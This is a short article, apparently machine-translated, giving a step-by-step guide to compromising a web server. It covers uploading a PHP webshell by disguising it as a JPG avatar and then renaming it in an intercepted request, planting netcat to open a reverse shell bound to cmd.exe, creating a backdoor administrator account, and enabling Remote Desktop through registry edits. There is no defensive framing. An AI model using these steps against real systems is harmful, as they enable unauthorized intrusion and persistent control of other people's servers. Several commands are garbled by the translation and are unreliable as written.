Shulou(Shulou.com)06/02 Report--

1. Change the suffix name of webshell.php to jpg and other picture formats, namely web.jpg.

2. Open the corresponding URL, register the account and select the upload avatar to run fiddler during web.jpg upload and set a breakpoint, switch to the raw interface, wait until it prompts the corresponding request code, change the second code containing the name of the uploaded image in the code segment to web.php, and then continue to respond to the request.

3. At this time, the backdoor program has been uploaded successfully, and the part of the code feedback from the server that contains the path is copied and pasted to the back of the website URL. Php override) refresh the web page.

4. Enter the corresponding password to enter the control server, and upload the local nc.exe (netcut) to its C disk root directory.

5. Then open the cmd command window locally and find the directory where nc.exe is located and run it.

6. After entering nc.exe, type nc-vv-l-p 8080 after Cmd line: to listen.

7. Select the Execute Command window on the control server, and enter'c:\ nc.exe-vv [own ip port]-e cmd.exe' to start nc (the cmd.exe bound to the server-side host is on the corresponding port of the machine)

8. Then you can add your own account as an administrator. The specific actions are as follows:

(1) net user hacker 3836546 / add (add users)

(2) net user localgroup administrators test / add (added to administrators group)

9. Write to the registry: REG ADD HKLM\ SYSTEM\ CurrentControlSet\ Control\ Terminal "Server / v fDenyTSConnections / t REG_DWORD / d 00000000 / f

(remote Desktop is enabled under win2k,winxp,win2k3 without reboot)

10. Sometimes port 3389 needs to be modified

[HKEY_LOCAL_MACHINE\ System\ CurrentControlSet\ Control\ Terminal Server\ Wds\ Repwd\ Tds\ Tcp]

[HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentContro1Set\ Control\ TenninalServer\ WinStations\ RDP-Tcp]

11. After completing the above process, you can access the server-side host to operate

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.